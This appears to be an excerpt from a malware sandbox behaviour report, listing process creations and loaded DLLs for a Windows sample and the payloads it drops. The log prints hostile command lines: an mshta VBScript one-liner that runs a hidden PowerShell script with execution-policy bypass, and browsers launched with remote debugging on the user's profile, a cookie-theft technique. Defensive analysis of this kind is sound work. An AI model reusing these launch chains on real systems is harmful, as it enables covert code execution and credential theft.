Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe "C:\Users\user\AppData\Local\Temp\1005627001\file1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7420 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe "C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe"
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 """""" ,0:close")
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe "C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe "C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe "C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsECAFHIIJJE.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2168,i,14858037877617579678,5688177104923091675,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2224,i,5174629620199250997,17853157087695469379,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7124 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7304 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7420 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsECAFHIIJJE.exe "C:\Users\user\DocumentsECAFHIIJJE.exe"
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe "C:\Users\user\AppData\Local\Temp\1005627001\file1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe "C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe "C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 "
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: winmm.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: wininet.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: sspicli.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: uxtheme.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: mstask.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: windows.storage.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: wldp.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: mpr.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: dui70.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: duser.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: chartv.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: oleacc.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: atlthunk.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: textinputframework.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: ntmarta.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: winsta.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: textshaping.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: propsys.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: explorerframe.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: iertutil.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: profapi.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: edputil.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: urlmon.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: srvcli.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: netutils.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: appresolver.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: slc.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: userenv.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: sppc.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
